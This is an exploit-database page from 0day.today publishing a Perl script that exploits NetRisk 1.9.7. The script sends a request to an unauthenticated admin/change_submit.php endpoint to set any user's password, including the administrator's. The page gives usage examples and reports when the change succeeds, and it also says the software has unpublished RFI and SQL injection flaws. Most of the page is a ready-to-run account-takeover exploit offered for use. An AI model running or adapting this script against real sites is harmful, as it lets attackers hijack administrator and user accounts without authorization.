0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit
================================================================ NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit ================================================================ #!/usr/bin/perl #=========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #=========================================================================================================================# # Author: Cod3rZ # # #=========================================================================================================================# # Status: Public # #=========================================================================================================================# # Board: NetRisk 1.9.7 # # Download: http://phprisk.org/netrisk_1.9.7.zip # #=========================================================================================================================# # Vuln Type: Remote Password Change [Exploit] # # Severity: Highest # #=========================================================================================================================# # The ACP haven't control and we can change the password of the other users # #=========================================================================================================================# # http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] # #=========================================================================================================================# # NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those # #=========================================================================================================================# use LWP::UserAgent; use HTTP::Request::Common; $lwp = new LWP::UserAgent; system('cls'); $site = $ARGV[0]; $user = $ARGV[1]; $pass = $ARGV[2]; print q{ --------------------------------------------------------------------- :: NetRisk 1.9.7 Remote Password Change Exploit :: --------------------------------------------------------------------- Author : Cod3rZ Email : songforthemoment@yahoo.it Site : http://cod3rz.helloweb.eu ---------------------------------------------------------------------}; if(!$site || !$user || !$pass) { print q{ Usage: perl netrisk.pl [site] [user] [newpass] Usage: perl netrisk.pl site.com/netrisk admin 123456 ---------------------------------------------------------------------}; system('exit'); } else { print " Site: $site User: $user Pass: $pass --------------------------------------------------------------------- Waiting... ---------------------------------------------------------------------"; $connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass); $content = $connect->content; if($content =~ /username->/) { print " Password Changed ---------------------------------------------------------------------"; } else { print " Error ---------------------------------------------------------------------"; } } # 0day.today [2024-12-25] #